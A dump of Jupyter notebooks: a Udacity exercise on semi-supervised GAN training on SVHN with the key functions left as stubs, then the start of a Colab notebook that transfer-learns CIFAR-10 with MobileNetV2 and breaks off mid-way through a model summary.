cb038affb664c2e845b4b50bdfcd66fca75d07ee | 27,641 | ipynb | Jupyter Notebook | deep-learning/udacity-deeplearning/semi-supervised/semi-supervised_learning_2.ipynb | HiteshDhola/Artificial-Intelligence-Deep-Learning-Machine-Learning-Tutorials | a0b839d412d2e7e4d8f3b3d885e318650399b857 | [
"Apache-2.0"
] | 3,266 | 2017-08-06T16:51:46.000Z | 2022-03-30T07:34:24.000Z | semi-supervised/semi-supervised_learning_2.ipynb | Ruqyai/deep-learning | c6b46a0bfcb8d4afcb806174b3923d3ea89ca455 | [
"MIT"
] | 150 | 2017-08-28T14:59:36.000Z | 2022-03-11T23:21:35.000Z | semi-supervised/semi-supervised_learning_2.ipynb | Ruqyai/deep-learning | c6b46a0bfcb8d4afcb806174b3923d3ea89ca455 | [
"MIT"
] | 1,449 | 2017-08-06T17:40:59.000Z | 2022-03-31T12:03:24.000Z | 39.771223 | 507 | 0.538801 | [
[
[
"In this notebook, we'll learn how to use GANs to do semi-supervised learning.\n\nIn supervised learning, we have a training set of inputs $x$ and class labels $y$. We train a model that takes $x$ as input and gives $y$ as output.\n\nIn semi-supervised learning, our goal is still to train a model that takes $x$ as input and generates $y$ as output. However, not all of our training examples have a label $y$. We need to develop an algorithm that is able to get better at classification by studying both labeled $(x, y)$ pairs and unlabeled $x$ examples.\n\nTo do this for the SVHN dataset, we'll turn the GAN discriminator into an 11 class discriminator. It will recognize the 10 different classes of real SVHN digits, as well as an 11th class of fake images that come from the generator. The discriminator will get to train on real labeled images, real unlabeled images, and fake images. By drawing on three sources of data instead of just one, it will generalize to the test set much better than a traditional classifier trained on only one source of data.",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\n\nimport pickle as pkl\nimport time\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.io import loadmat\nimport tensorflow as tf\n",
"_____no_output_____"
],
[
"!mkdir data",
"_____no_output_____"
],
[
"from urllib.request import urlretrieve\nfrom os.path import isfile, isdir\nfrom tqdm import tqdm\n\ndata_dir = 'data/'\n\nif not isdir(data_dir):\n raise Exception(\"Data directory doesn't exist!\")\n\nclass DLProgress(tqdm):\n last_block = 0\n\n def hook(self, block_num=1, block_size=1, total_size=None):\n self.total = total_size\n self.update((block_num - self.last_block) * block_size)\n self.last_block = block_num\n\nif not isfile(data_dir + \"train_32x32.mat\"):\n with DLProgress(unit='B', unit_scale=True, miniters=1, desc='SVHN Training Set') as pbar:\n urlretrieve(\n 'http://ufldl.stanford.edu/housenumbers/train_32x32.mat',\n data_dir + 'train_32x32.mat',\n pbar.hook)\n\nif not isfile(data_dir + \"test_32x32.mat\"):\n with DLProgress(unit='B', unit_scale=True, miniters=1, desc='SVHN Training Set') as pbar:\n urlretrieve(\n 'http://ufldl.stanford.edu/housenumbers/test_32x32.mat',\n data_dir + 'test_32x32.mat',\n pbar.hook)",
"_____no_output_____"
],
[
"trainset = loadmat(data_dir + 'train_32x32.mat')\ntestset = loadmat(data_dir + 'test_32x32.mat')",
"_____no_output_____"
],
[
"idx = np.random.randint(0, trainset['X'].shape[3], size=36)\nfig, axes = plt.subplots(6, 6, sharex=True, sharey=True, figsize=(5,5),)\nfor ii, ax in zip(idx, axes.flatten()):\n ax.imshow(trainset['X'][:,:,:,ii], aspect='equal')\n ax.xaxis.set_visible(False)\n ax.yaxis.set_visible(False)\nplt.subplots_adjust(wspace=0, hspace=0)",
"_____no_output_____"
],
[
"def scale(x, feature_range=(-1, 1)):\n # scale to (0, 1)\n x = ((x - x.min())/(255 - x.min()))\n \n # scale to feature_range\n min, max = feature_range\n x = x * (max - min) + min\n return x",
"_____no_output_____"
],
[
"class Dataset:\n def __init__(self, train, test, val_frac=0.5, shuffle=True, scale_func=None):\n split_idx = int(len(test['y'])*(1 - val_frac))\n self.test_x, self.valid_x = test['X'][:,:,:,:split_idx], test['X'][:,:,:,split_idx:]\n self.test_y, self.valid_y = test['y'][:split_idx], test['y'][split_idx:]\n self.train_x, self.train_y = train['X'], train['y']\n # The SVHN dataset comes with lots of labels, but for the purpose of this exercise,\n # we will pretend that there are only 1000.\n # We use this mask to say which labels we will allow ourselves to use.\n self.label_mask = np.zeros_like(self.train_y)\n self.label_mask[0:1000] = 1\n \n self.train_x = np.rollaxis(self.train_x, 3)\n self.valid_x = np.rollaxis(self.valid_x, 3)\n self.test_x = np.rollaxis(self.test_x, 3)\n \n if scale_func is None:\n self.scaler = scale\n else:\n self.scaler = scale_func\n self.train_x = self.scaler(self.train_x)\n self.valid_x = self.scaler(self.valid_x)\n self.test_x = self.scaler(self.test_x)\n self.shuffle = shuffle\n \n def batches(self, batch_size, which_set=\"train\"):\n x_name = which_set + \"_x\"\n y_name = which_set + \"_y\"\n \n num_examples = len(getattr(dataset, y_name))\n if self.shuffle:\n idx = np.arange(num_examples)\n np.random.shuffle(idx)\n setattr(dataset, x_name, getattr(dataset, x_name)[idx])\n setattr(dataset, y_name, getattr(dataset, y_name)[idx])\n if which_set == \"train\":\n dataset.label_mask = dataset.label_mask[idx]\n \n dataset_x = getattr(dataset, x_name)\n dataset_y = getattr(dataset, y_name)\n for ii in range(0, num_examples, batch_size):\n x = dataset_x[ii:ii+batch_size]\n y = dataset_y[ii:ii+batch_size]\n \n if which_set == \"train\":\n # When we use the data for training, we need to include\n # the label mask, so we can pretend we don't have access\n # to some of the labels, as an exercise of our semi-supervised\n # learning ability\n yield x, y, self.label_mask[ii:ii+batch_size]\n else:\n yield x, y",
"_____no_output_____"
],
[
"def model_inputs(real_dim, z_dim):\n inputs_real = tf.placeholder(tf.float32, (None, *real_dim), name='input_real')\n inputs_z = tf.placeholder(tf.float32, (None, z_dim), name='input_z')\n y = tf.placeholder(tf.int32, (None), name='y')\n label_mask = tf.placeholder(tf.int32, (None), name='label_mask')\n \n return inputs_real, inputs_z, y, label_mask",
"_____no_output_____"
],
[
"def generator(z, output_dim, reuse=False, alpha=0.2, training=True, size_mult=128):\n with tf.variable_scope('generator', reuse=reuse):\n # First fully connected layer\n x1 = tf.layers.dense(z, 4 * 4 * size_mult * 4)\n # Reshape it to start the convolutional stack\n x1 = tf.reshape(x1, (-1, 4, 4, size_mult * 4))\n x1 = tf.layers.batch_normalization(x1, training=training)\n x1 = tf.maximum(alpha * x1, x1)\n \n x2 = tf.layers.conv2d_transpose(x1, size_mult * 2, 5, strides=2, padding='same')\n x2 = tf.layers.batch_normalization(x2, training=training)\n x2 = tf.maximum(alpha * x2, x2)\n \n x3 = tf.layers.conv2d_transpose(x2, size_mult, 5, strides=2, padding='same')\n x3 = tf.layers.batch_normalization(x3, training=training)\n x3 = tf.maximum(alpha * x3, x3)\n \n # Output layer\n logits = tf.layers.conv2d_transpose(x3, output_dim, 5, strides=2, padding='same')\n \n out = tf.tanh(logits)\n \n return out",
"_____no_output_____"
],
[
"def discriminator(x, reuse=False, alpha=0.2, drop_rate=0., num_classes=10, size_mult=64):\n with tf.variable_scope('discriminator', reuse=reuse):\n x = tf.layers.dropout(x, rate=drop_rate/2.5)\n \n # Input layer is 32x32x3\n x1 = tf.layers.conv2d(x, size_mult, 3, strides=2, padding='same')\n relu1 = tf.maximum(alpha * x1, x1)\n relu1 = tf.layers.dropout(relu1, rate=drop_rate)\n \n x2 = tf.layers.conv2d(relu1, size_mult, 3, strides=2, padding='same')\n bn2 = tf.layers.batch_normalization(x2, training=True)\n relu2 = tf.maximum(alpha * x2, x2)\n \n \n x3 = tf.layers.conv2d(relu2, size_mult, 3, strides=2, padding='same')\n bn3 = tf.layers.batch_normalization(x3, training=True)\n relu3 = tf.maximum(alpha * bn3, bn3)\n relu3 = tf.layers.dropout(relu3, rate=drop_rate)\n \n x4 = tf.layers.conv2d(relu3, 2 * size_mult, 3, strides=1, padding='same')\n bn4 = tf.layers.batch_normalization(x4, training=True)\n relu4 = tf.maximum(alpha * bn4, bn4)\n \n x5 = tf.layers.conv2d(relu4, 2 * size_mult, 3, strides=1, padding='same')\n bn5 = tf.layers.batch_normalization(x5, training=True)\n relu5 = tf.maximum(alpha * bn5, bn5)\n \n x6 = tf.layers.conv2d(relu5, 2 * size_mult, 3, strides=2, padding='same')\n bn6 = tf.layers.batch_normalization(x6, training=True)\n relu6 = tf.maximum(alpha * bn6, bn6)\n relu6 = tf.layers.dropout(relu6, rate=drop_rate)\n \n x7 = tf.layers.conv2d(relu5, 2 * size_mult, 3, strides=1, padding='valid')\n # Don't use bn on this layer, because bn would set the mean of each feature\n # to the bn mu parameter.\n # This layer is used for the feature matching loss, which only works if\n # the means can be different when the discriminator is run on the data than\n # when the discriminator is run on the generator samples.\n relu7 = tf.maximum(alpha * x7, x7)\n \n # Flatten it by global average pooling\n features = raise NotImplementedError()\n \n # Set class_logits to be the inputs to a softmax distribution over the different classes\n raise NotImplementedError()\n \n \n # Set gan_logits such that P(input is real | input) = sigmoid(gan_logits).\n # Keep in mind that class_logits gives you the probability distribution over all the real\n # classes and the fake class. You need to work out how to transform this multiclass softmax\n # distribution into a binary real-vs-fake decision that can be described with a sigmoid.\n # Numerical stability is very important.\n # You'll probably need to use this numerical stability trick:\n # log sum_i exp a_i = m + log sum_i exp(a_i - m).\n # This is numerically stable when m = max_i a_i.\n # (It helps to think about what goes wrong when...\n # 1. One value of a_i is very large\n # 2. All the values of a_i are very negative\n # This trick and this value of m fix both those cases, but the naive implementation and\n # other values of m encounter various problems)\n \n raise NotImplementedError()\n \n return out, class_logits, gan_logits, features",
"_____no_output_____"
],
[
"def model_loss(input_real, input_z, output_dim, y, num_classes, label_mask, alpha=0.2, drop_rate=0.):\n \"\"\"\n Get the loss for the discriminator and generator\n :param input_real: Images from the real dataset\n :param input_z: Z input\n :param output_dim: The number of channels in the output image\n :param y: Integer class labels\n :param num_classes: The number of classes\n :param alpha: The slope of the left half of leaky ReLU activation\n :param drop_rate: The probability of dropping a hidden unit\n :return: A tuple of (discriminator loss, generator loss)\n \"\"\"\n \n \n # These numbers multiply the size of each layer of the generator and the discriminator,\n # respectively. You can reduce them to run your code faster for debugging purposes.\n g_size_mult = 32\n d_size_mult = 64\n \n # Here we run the generator and the discriminator\n g_model = generator(input_z, output_dim, alpha=alpha, size_mult=g_size_mult)\n d_on_data = discriminator(input_real, alpha=alpha, drop_rate=drop_rate, size_mult=d_size_mult)\n d_model_real, class_logits_on_data, gan_logits_on_data, data_features = d_on_data\n d_on_samples = discriminator(g_model, reuse=True, alpha=alpha, drop_rate=drop_rate, size_mult=d_size_mult)\n d_model_fake, class_logits_on_samples, gan_logits_on_samples, sample_features = d_on_samples\n \n \n # Here we compute `d_loss`, the loss for the discriminator.\n # This should combine two different losses:\n # 1. The loss for the GAN problem, where we minimize the cross-entropy for the binary\n # real-vs-fake classification problem.\n # 2. The loss for the SVHN digit classification problem, where we minimize the cross-entropy\n # for the multi-class softmax. For this one we use the labels. Don't forget to ignore\n # use `label_mask` to ignore the examples that we are pretending are unlabeled for the\n # semi-supervised learning problem.\n raise NotImplementedError()\n \n # Here we set `g_loss` to the \"feature matching\" loss invented by Tim Salimans at OpenAI.\n # This loss consists of minimizing the absolute difference between the expected features\n # on the data and the expected features on the generated samples.\n # This loss works better for semi-supervised learning than the tradition GAN losses.\n raise NotImplementedError()\n\n pred_class = tf.cast(tf.argmax(class_logits_on_data, 1), tf.int32)\n eq = tf.equal(tf.squeeze(y), pred_class)\n correct = tf.reduce_sum(tf.to_float(eq))\n masked_correct = tf.reduce_sum(label_mask * tf.to_float(eq))\n \n return d_loss, g_loss, correct, masked_correct, g_model",
"_____no_output_____"
],
[
"def model_opt(d_loss, g_loss, learning_rate, beta1):\n \"\"\"\n Get optimization operations\n :param d_loss: Discriminator loss Tensor\n :param g_loss: Generator loss Tensor\n :param learning_rate: Learning Rate Placeholder\n :param beta1: The exponential decay rate for the 1st moment in the optimizer\n :return: A tuple of (discriminator training operation, generator training operation)\n \"\"\"\n # Get weights and biases to update. Get them separately for the discriminator and the generator\n raise NotImplementedError()\n\n # Minimize both players' costs simultaneously\n raise NotImplementedError()\n shrink_lr = tf.assign(learning_rate, learning_rate * 0.9)\n \n return d_train_opt, g_train_opt, shrink_lr",
"_____no_output_____"
],
[
"class GAN:\n \"\"\"\n A GAN model.\n :param real_size: The shape of the real data.\n :param z_size: The number of entries in the z code vector.\n :param learnin_rate: The learning rate to use for Adam.\n :param num_classes: The number of classes to recognize.\n :param alpha: The slope of the left half of the leaky ReLU activation\n :param beta1: The beta1 parameter for Adam.\n \"\"\"\n def __init__(self, real_size, z_size, learning_rate, num_classes=10, alpha=0.2, beta1=0.5):\n tf.reset_default_graph()\n \n self.learning_rate = tf.Variable(learning_rate, trainable=False)\n inputs = model_inputs(real_size, z_size)\n self.input_real, self.input_z, self.y, self.label_mask = inputs\n self.drop_rate = tf.placeholder_with_default(.5, (), \"drop_rate\")\n \n loss_results = model_loss(self.input_real, self.input_z,\n real_size[2], self.y, num_classes,\n label_mask=self.label_mask,\n alpha=0.2,\n drop_rate=self.drop_rate)\n self.d_loss, self.g_loss, self.correct, self.masked_correct, self.samples = loss_results\n \n self.d_opt, self.g_opt, self.shrink_lr = model_opt(self.d_loss, self.g_loss, self.learning_rate, beta1)",
"_____no_output_____"
],
[
"def view_samples(epoch, samples, nrows, ncols, figsize=(5,5)):\n fig, axes = plt.subplots(figsize=figsize, nrows=nrows, ncols=ncols, \n sharey=True, sharex=True)\n for ax, img in zip(axes.flatten(), samples[epoch]):\n ax.axis('off')\n img = ((img - img.min())*255 / (img.max() - img.min())).astype(np.uint8)\n ax.set_adjustable('box-forced')\n im = ax.imshow(img)\n \n plt.subplots_adjust(wspace=0, hspace=0)\n return fig, axes",
"_____no_output_____"
],
[
"def train(net, dataset, epochs, batch_size, figsize=(5,5)):\n \n saver = tf.train.Saver()\n sample_z = np.random.normal(0, 1, size=(50, z_size))\n\n samples, train_accuracies, test_accuracies = [], [], []\n steps = 0\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for e in range(epochs):\n print(\"Epoch\",e)\n \n t1e = time.time()\n num_examples = 0\n num_correct = 0\n for x, y, label_mask in dataset.batches(batch_size):\n assert 'int' in str(y.dtype)\n steps += 1\n num_examples += label_mask.sum()\n\n # Sample random noise for G\n batch_z = np.random.normal(0, 1, size=(batch_size, z_size))\n\n # Run optimizers\n t1 = time.time()\n _, _, correct = sess.run([net.d_opt, net.g_opt, net.masked_correct],\n feed_dict={net.input_real: x, net.input_z: batch_z,\n net.y : y, net.label_mask : label_mask})\n t2 = time.time()\n num_correct += correct\n\n sess.run([net.shrink_lr])\n \n \n train_accuracy = num_correct / float(num_examples)\n \n print(\"\\t\\tClassifier train accuracy: \", train_accuracy)\n \n num_examples = 0\n num_correct = 0\n for x, y in dataset.batches(batch_size, which_set=\"test\"):\n assert 'int' in str(y.dtype)\n num_examples += x.shape[0]\n\n correct, = sess.run([net.correct], feed_dict={net.input_real: x,\n net.y : y,\n net.drop_rate: 0.})\n num_correct += correct\n \n test_accuracy = num_correct / float(num_examples)\n print(\"\\t\\tClassifier test accuracy\", test_accuracy)\n print(\"\\t\\tStep time: \", t2 - t1)\n t2e = time.time()\n print(\"\\t\\tEpoch time: \", t2e - t1e)\n \n \n gen_samples = sess.run(\n net.samples,\n feed_dict={net.input_z: sample_z})\n samples.append(gen_samples)\n _ = view_samples(-1, samples, 5, 10, figsize=figsize)\n plt.show()\n \n \n # Save history of accuracies to view after training\n train_accuracies.append(train_accuracy)\n test_accuracies.append(test_accuracy)\n \n\n saver.save(sess, './checkpoints/generator.ckpt')\n\n with open('samples.pkl', 'wb') as f:\n pkl.dump(samples, f)\n \n return train_accuracies, test_accuracies, samples",
"_____no_output_____"
],
[
"!mkdir checkpoints",
"_____no_output_____"
],
[
"real_size = (32,32,3)\nz_size = 100\nlearning_rate = 0.0003\n\nnet = GAN(real_size, z_size, learning_rate)",
"_____no_output_____"
],
[
"dataset = Dataset(trainset, testset)\n\nbatch_size = 128\nepochs = 25\ntrain_accuracies, test_accuracies, samples = train(net,\n dataset,\n epochs,\n batch_size,\n figsize=(10,5))",
"_____no_output_____"
],
[
"fig, ax = plt.subplots()\nplt.plot(train_accuracies, label='Train', alpha=0.5)\nplt.plot(test_accuracies, label='Test', alpha=0.5)\nplt.title(\"Accuracy\")\nplt.legend()",
"_____no_output_____"
]
],
[
[
"When you run the fully implemented semi-supervised GAN, you should usually find that the test accuracy peaks at 69-71%. It should definitely stay above 68% fairly consistently throughout the last several epochs of training.\n\nThis is a little bit better than a [NIPS 2014 paper](https://arxiv.org/pdf/1406.5298.pdf) that got 64% accuracy on 1000-label SVHN with variational methods. However, we still have lost something by not using all the labels. If you re-run with all the labels included, you should obtain over 80% accuracy using this architecture (and other architectures that take longer to run can do much better).",
"_____no_output_____"
]
],
[
[
"_ = view_samples(-1, samples, 5, 10, figsize=(10,5))",
"_____no_output_____"
],
[
"!mkdir images",
"_____no_output_____"
],
[
"for ii in range(len(samples)):\n fig, ax = view_samples(ii, samples, 5, 10, figsize=(10,5))\n fig.savefig('images/samples_{:03d}.png'.format(ii))\n plt.close()",
"_____no_output_____"
]
],
[
[
"Congratulations! You now know how to train a semi-supervised GAN. This exercise is stripped down to make it run faster and to make it simpler to implement. In the original work by Tim Salimans at OpenAI, a GAN using [more tricks and more runtime](https://arxiv.org/pdf/1606.03498.pdf) reaches over 94% accuracy using only 1,000 labeled examples.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
]
] |
cb03904ff559daa6c907933c97fd74a842419685 | 86,730 | ipynb | Jupyter Notebook | colab_file.ipynb | msteknoadam/tf_image_classification | a70189101670c1fb97d81c9bc3457ef8f13f0ed7 | [
"MIT"
] | null | null | null | colab_file.ipynb | msteknoadam/tf_image_classification | a70189101670c1fb97d81c9bc3457ef8f13f0ed7 | [
"MIT"
] | null | null | null | colab_file.ipynb | msteknoadam/tf_image_classification | a70189101670c1fb97d81c9bc3457ef8f13f0ed7 | [
"MIT"
] | null | null | null | 90.721757 | 30,232 | 0.713456 | [
[
[
"try:\n # %tensorflow_version only exists in Colab.\n %tensorflow_version 2.x\nexcept Exception:\n pass\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport tensorflow_datasets as tfds",
"TensorFlow 2.x selected.\n"
],
[
"SPLIT_WEIGHTS = (8, 1, 1)\nsplits = tfds.Split.TRAIN.subsplit(weighted=SPLIT_WEIGHTS)\n\n(raw_train, raw_validation, raw_test), metadata = tfds.load(\n 'cifar10', split=list(splits),\n with_info=True, as_supervised=True)",
"_____no_output_____"
],
[
"class_names = ['airplane', 'automobile', 'bird', 'cat', 'deer',\n 'dog', 'frog', 'horse', 'ship', 'truck']",
"_____no_output_____"
],
[
"IMG_SIZE = 128\n\ndef format_example(image, label):\n image = tf.cast(image, tf.float32)\n # image = (image/127.5) - 1\n image = tf.image.resize(image, (IMG_SIZE, IMG_SIZE))\n return image, label",
"_____no_output_____"
],
[
"train = raw_train.map(format_example)\nvalidation = raw_validation.map(format_example)\ntest = raw_test.map(format_example)",
"_____no_output_____"
],
[
"BATCH_SIZE = 32\nSHUFFLE_BUFFER_SIZE = 1000",
"_____no_output_____"
],
[
"train_batches = train.shuffle(SHUFFLE_BUFFER_SIZE).batch(BATCH_SIZE)\nvalidation_batches = validation.batch(BATCH_SIZE)\ntest_batches = test.batch(BATCH_SIZE)",
"_____no_output_____"
],
[
"for image_batch, label_batch in train_batches.take(1):\n pass\n\nimage_batch.shape",
"_____no_output_____"
],
[
"IMG_SHAPE = (IMG_SIZE, IMG_SIZE, 3)\n\nbase_model = tf.keras.applications.MobileNetV2(input_shape=IMG_SHAPE,\n include_top=False,\n weights='imagenet')",
"Downloading data from https://github.com/JonathanCMitchell/mobilenet_v2_keras/releases/download/v1.1/mobilenet_v2_weights_tf_dim_ordering_tf_kernels_1.0_128_no_top.h5\n9412608/9406464 [==============================] - 0s 0us/step\n"
],
[
"feature_batch = base_model(image_batch)\nprint(feature_batch.shape)",
"(32, 4, 4, 1280)\n"
],
[
"base_model.trainable = False",
"_____no_output_____"
],
[
"base_model.summary()",
"Model: \"mobilenetv2_1.00_128\"\n__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_1 (InputLayer) [(None, 128, 128, 3) 0 \n__________________________________________________________________________________________________\nConv1_pad (ZeroPadding2D) (None, 129, 129, 3) 0 input_1[0][0] \n__________________________________________________________________________________________________\nConv1 (Conv2D) (None, 64, 64, 32) 864 Conv1_pad[0][0] \n__________________________________________________________________________________________________\nbn_Conv1 (BatchNormalization) (None, 64, 64, 32) 128 Conv1[0][0] \n__________________________________________________________________________________________________\nConv1_relu (ReLU) (None, 64, 64, 32) 0 bn_Conv1[0][0] \n__________________________________________________________________________________________________\nexpanded_conv_depthwise (Depthw (None, 64, 64, 32) 288 Conv1_relu[0][0] \n__________________________________________________________________________________________________\nexpanded_conv_depthwise_BN (Bat (None, 64, 64, 32) 128 expanded_conv_depthwise[0][0] \n__________________________________________________________________________________________________\nexpanded_conv_depthwise_relu (R (None, 64, 64, 32) 0 expanded_conv_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nexpanded_conv_project (Conv2D) (None, 64, 64, 16) 512 expanded_conv_depthwise_relu[0][0\n__________________________________________________________________________________________________\nexpanded_conv_project_BN (Batch (None, 64, 64, 16) 64 expanded_conv_project[0][0] \n__________________________________________________________________________________________________\nblock_1_expand (Conv2D) (None, 64, 64, 96) 1536 expanded_conv_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_1_expand_BN (BatchNormali (None, 64, 64, 96) 384 block_1_expand[0][0] \n__________________________________________________________________________________________________\nblock_1_expand_relu (ReLU) (None, 64, 64, 96) 0 block_1_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_1_pad (ZeroPadding2D) (None, 65, 65, 96) 0 block_1_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_1_depthwise (DepthwiseCon (None, 32, 32, 96) 864 block_1_pad[0][0] \n__________________________________________________________________________________________________\nblock_1_depthwise_BN (BatchNorm (None, 32, 32, 96) 384 block_1_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_1_depthwise_relu (ReLU) (None, 32, 32, 96) 0 block_1_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_1_project (Conv2D) (None, 32, 32, 24) 2304 block_1_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_1_project_BN (BatchNormal (None, 32, 32, 24) 96 block_1_project[0][0] \n__________________________________________________________________________________________________\nblock_2_expand (Conv2D) (None, 32, 32, 144) 3456 block_1_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_2_expand_BN (BatchNormali (None, 32, 32, 144) 576 block_2_expand[0][0] \n__________________________________________________________________________________________________\nblock_2_expand_relu (ReLU) (None, 32, 32, 144) 0 block_2_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_2_depthwise (DepthwiseCon (None, 32, 32, 144) 1296 block_2_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_2_depthwise_BN (BatchNorm (None, 32, 32, 144) 576 block_2_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_2_depthwise_relu (ReLU) (None, 32, 32, 144) 0 block_2_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_2_project (Conv2D) (None, 32, 32, 24) 3456 block_2_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_2_project_BN (BatchNormal (None, 32, 32, 24) 96 block_2_project[0][0] \n__________________________________________________________________________________________________\nblock_2_add (Add) (None, 32, 32, 24) 0 block_1_project_BN[0][0] \n block_2_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_3_expand (Conv2D) (None, 32, 32, 144) 3456 block_2_add[0][0] \n__________________________________________________________________________________________________\nblock_3_expand_BN (BatchNormali (None, 32, 32, 144) 576 block_3_expand[0][0] \n__________________________________________________________________________________________________\nblock_3_expand_relu (ReLU) (None, 32, 32, 144) 0 block_3_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_3_pad (ZeroPadding2D) (None, 33, 33, 144) 0 block_3_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_3_depthwise (DepthwiseCon (None, 16, 16, 144) 1296 block_3_pad[0][0] \n__________________________________________________________________________________________________\nblock_3_depthwise_BN (BatchNorm (None, 16, 16, 144) 576 block_3_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_3_depthwise_relu (ReLU) (None, 16, 16, 144) 0 block_3_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_3_project (Conv2D) (None, 16, 16, 32) 4608 block_3_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_3_project_BN (BatchNormal (None, 16, 16, 32) 128 block_3_project[0][0] \n__________________________________________________________________________________________________\nblock_4_expand (Conv2D) (None, 16, 16, 192) 6144 block_3_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_4_expand_BN (BatchNormali (None, 16, 16, 192) 768 block_4_expand[0][0] \n__________________________________________________________________________________________________\nblock_4_expand_relu (ReLU) (None, 16, 16, 192) 0 block_4_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_4_depthwise (DepthwiseCon (None, 16, 16, 192) 1728 block_4_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_4_depthwise_BN (BatchNorm (None, 16, 16, 192) 768 block_4_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_4_depthwise_relu (ReLU) (None, 16, 16, 192) 0 block_4_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_4_project (Conv2D) (None, 16, 16, 32) 6144 block_4_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_4_project_BN (BatchNormal (None, 16, 16, 32) 128 block_4_project[0][0] \n__________________________________________________________________________________________________\nblock_4_add (Add) (None, 16, 16, 32) 0 block_3_project_BN[0][0] \n block_4_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_5_expand (Conv2D) (None, 16, 16, 192) 6144 block_4_add[0][0] \n__________________________________________________________________________________________________\nblock_5_expand_BN (BatchNormali (None, 16, 16, 192) 768 block_5_expand[0][0] \n__________________________________________________________________________________________________\nblock_5_expand_relu (ReLU) (None, 16, 16, 192) 0 block_5_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_5_depthwise (DepthwiseCon (None, 16, 16, 192) 1728 block_5_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_5_depthwise_BN (BatchNorm (None, 16, 16, 192) 768 block_5_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_5_depthwise_relu (ReLU) (None, 16, 16, 192) 0 block_5_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_5_project (Conv2D) (None, 16, 16, 32) 6144 block_5_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_5_project_BN (BatchNormal (None, 16, 16, 32) 128 block_5_project[0][0] \n__________________________________________________________________________________________________\nblock_5_add (Add) (None, 16, 16, 32) 0 block_4_add[0][0] \n block_5_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_6_expand (Conv2D) (None, 16, 16, 192) 6144 block_5_add[0][0] \n__________________________________________________________________________________________________\nblock_6_expand_BN (BatchNormali (None, 16, 16, 192) 768 block_6_expand[0][0] \n__________________________________________________________________________________________________\nblock_6_expand_relu (ReLU) (None, 16, 16, 192) 0 block_6_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_6_pad (ZeroPadding2D) (None, 17, 17, 192) 0 block_6_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_6_depthwise (DepthwiseCon (None, 8, 8, 192) 1728 block_6_pad[0][0] \n__________________________________________________________________________________________________\nblock_6_depthwise_BN (BatchNorm (None, 8, 8, 192) 768 block_6_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_6_depthwise_relu (ReLU) (None, 8, 8, 192) 0 block_6_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_6_project (Conv2D) (None, 8, 8, 64) 12288 block_6_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_6_project_BN (BatchNormal (None, 8, 8, 64) 256 block_6_project[0][0] \n__________________________________________________________________________________________________\nblock_7_expand (Conv2D) (None, 8, 8, 384) 24576 block_6_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_7_expand_BN (BatchNormali (None, 8, 8, 384) 1536 block_7_expand[0][0] \n__________________________________________________________________________________________________\nblock_7_expand_relu (ReLU) (None, 8, 8, 384) 0 block_7_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_7_depthwise (DepthwiseCon (None, 8, 8, 384) 3456 block_7_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_7_depthwise_BN (BatchNorm (None, 8, 8, 384) 1536 block_7_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_7_depthwise_relu (ReLU) (None, 8, 8, 384) 0 block_7_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_7_project (Conv2D) (None, 8, 8, 64) 24576 block_7_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_7_project_BN (BatchNormal (None, 8, 8, 64) 256 block_7_project[0][0] \n__________________________________________________________________________________________________\nblock_7_add (Add) (None, 8, 8, 64) 0 block_6_project_BN[0][0] \n block_7_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_8_expand (Conv2D) (None, 8, 8, 384) 24576 block_7_add[0][0] \n__________________________________________________________________________________________________\nblock_8_expand_BN (BatchNormali (None, 8, 8, 384) 1536 block_8_expand[0][0] \n__________________________________________________________________________________________________\nblock_8_expand_relu (ReLU) (None, 8, 8, 